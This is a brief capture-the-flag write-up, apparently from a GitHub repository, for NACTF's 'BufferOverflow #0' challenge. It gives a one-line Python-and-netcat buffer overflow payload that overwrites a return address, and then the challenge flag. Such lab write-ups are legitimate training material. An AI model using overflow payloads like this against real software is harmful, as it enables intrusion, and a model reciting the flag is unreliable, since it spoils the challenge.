Skip to content

Latest commit

 

History

History
22 lines (18 loc) · 408 Bytes

File metadata and controls

22 lines (18 loc) · 408 Bytes

BufferOverflow #0

Binary Exploitation - Points: 100

The close cousin of a website for "Question marked as duplicate"

Can you cause a segfault and get the flag?

shell.2019.nactf.com:31475

bufover-0

bufover-0.c

$ python -c 'print("A"*20+"\xc2\x91\x04\x08")' | nc ingress.cluster.nactf.com 31475

flag: nactf{0v3rfl0w_th4at_buff3r_18ghKusB}